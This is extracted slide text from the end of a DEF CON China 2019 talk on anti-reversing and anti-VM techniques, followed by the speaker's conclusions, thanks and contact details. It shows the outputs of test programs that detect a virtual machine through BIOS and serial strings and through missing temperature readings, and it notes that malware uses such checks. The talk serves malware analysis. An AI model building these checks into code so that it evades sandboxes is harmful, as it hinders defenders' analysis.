Guest virtual machine:
E:\> Test_VM.exe
Attributes:
Version: LENOVO - 6040000
SerialNumber: VMware-56 4d 8d c3 a7 c7 e5 2b-39 d6 cc 93 bf 90 28 2d
OperatingSystem: 0
Manufacturer: Phoenix Technologies LTD
112. DEF CON CHINA 1.0 (2019) 112
113. DEF CON CHINA 1.0 (2019) 113
Double-click the result...
114. DEF CON CHINA 1.0 (2019) 114
115. DEF CON CHINA 1.0 (2019) 115
116. DEF CON CHINA 1.0 (2019) 116
There is no support for acquiring temperature data in virtual machines.
Therefore, malware is able to know whether it is running in a virtual machine or not.
Physical host:
C:\> VM_Test2.exe
Status: OK
Thus, the program is running in a physical host!
Virtual machine:
C:\> VM_Test2.exe
This program IS RUNNING in a virtual machine!
117. DEF CON CHINA 1.0 (2019) 117
FEW CONCLUSIONS:
Before trying to unpack modern protectors, it is really necessary to understand the common anti-reversing techniques.
MIASM, METASM and TRITON are amazing tools to handle and deobfuscate complex code.
Emulation is a possible alternative for understanding small and complicated pieces of code.
DTrace has done an excellent job on Solaris and it may be an excellent tool on the Windows operating system. Stay tuned.
Although excellent researchers have found sophisticated anti-VM techniques, many other simple and smart ones exist. Take care.
118. DEF CON CHINA 1.0 (2019) 118
Acknowledgments to:
DEF CON's staff, who have always been very kind to me.
You, who reserved some time to attend my talk.
Remember: the best thing in this life is people.
119. DEF CON CHINA 1.0 (2019)
119
ALEXANDRE BORGES – IT IS NOT ALLOWED TO COPY OR REPRODUCE THIS SLIDE.
Malware and Security Researcher.
Speaker at DEFCON USA 2018
Speaker at HITB2019 Amsterdam
Speaker at CONFidence Conf. 2019
Speaker at BSIDES 2018/2017/2016
Speaker at H2HC 2016/2015
Speaker at BHACK 2018
Consultant, Instructor and Speaker on Malware Analysis, Memory Analysis, Digital Forensics and Rootkits.
Reviewer member of The Journal of Digital Forensics, Security and Law.
Referee on Digital Investigation: The International Journal of Digital Forensics & Incident Response.
THANK YOU FOR ATTENDING MY TALK.
謝謝
Twitter:
@ale_sp_brazil
@blackstormsecbr
Website: http://blackstormsecurity.com
LinkedIn:
http://www.linkedin.com/in/aleborges
E-mail:
alexandreborges@blackstormsecurity.com